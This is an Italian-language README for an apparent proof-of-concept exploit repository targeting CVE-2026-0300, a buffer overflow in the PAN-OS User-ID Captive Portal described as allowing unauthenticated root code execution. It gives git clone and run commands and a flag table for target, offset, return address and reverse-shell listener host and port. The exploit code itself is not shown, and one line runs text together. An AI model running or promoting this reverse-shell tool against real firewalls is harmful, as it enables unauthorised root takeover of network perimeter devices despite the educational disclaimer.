
Proof-of-concept per CVE-2026-0300, un buffer overflow critico nel portale User-ID di PAN-OS che consente l'esecuzione remota di codice non autenticata con privilegi di root.
CVE-2026-0300 è una vulnerabilità di buffer overflow ad alta gravità identificata nel Portale di Autenticazione User-ID™ (Captive Portal) di Palo Alto Networks PAN-OS. Questo repository di ricerca dimostra la logica tecnica della vulnerabilità, concentrandosi in particolare su come un pacchetto di rete non autenticato possa portare a Remote Code Execution (RCE) con privilegi di root.
| Caratteristica | Dettagli |
|---|---|
| ID CVE | CVE-2026-0300 |
| Punteggio di Gravità | 9.3 (Critico) |
| Tipo di Debolezza | CWE-787: Scrittura Fuori dai Limiti |
| Vettore di Attacco | Rete (Non Autenticato) |
| Privilegi Richiesti | Nessuno |
| Interazione Utente | Nessuna |
| Software Interessato | PAN-OS 12.1, 11.2, 11.1, 10.2 |
La vulnerabilità si verifica quando il servizio del Portale di Autenticazione User-ID non riesce a validare la lunghezza dei dati in arrivo prima di scriverli in un buffer di memoria.
socket, struct e argparse).git clone https://github.com/p3Nt3st3r-sTAr/CVE-2026-0300-POC.git
cd CVE-2026-0300-POC
chmod +x research_poc.py
Questo strumento è progettato con una CLI (Interfaccia a Riga di Comando) professionale.
python3 research_poc.py -t <TARGET_IP> --lhost <LISTEN_IP> -L <LISTEN_PORT>
| Flag | Nome | Descrizione | Predefinito |
|---|---|---|---|
| -t | --target | (Obbligatorio) Indirizzo IP del firewall di destinazione. | N/D |
| -p | --port | La porta su cui è in esecuzione il Portale User-ID. | 6082 |
| -o | --offset | La lunghezza in byte per raggiungere il punto di overflow della memoria. | 2048 |
| -r | --ret | L'indirizzo di ritorno esadecimale. | 0xdeadbeef |
| -l | --lhost | indirizzo IP della reverse shell | Il tuo IP |
| -L | --lport | La tua Porta di Ascolto | 4444 |
SOLO PER SCOPI EDUCATIVI E DI RICERCA AUTORIZZATA. I test non autorizzati contro sistemi che non possiedi sono illegali. L'autore non è responsabile per qualsiasi uso improprio di questo codice di ricerca. Usalo in modo responsabile per migliorare la sicurezza globale. Sviluppato Da: https://t.me/p3Nt3st3rsTAr Data di Scoperta della Vulnerabilità: 07 maggio 2026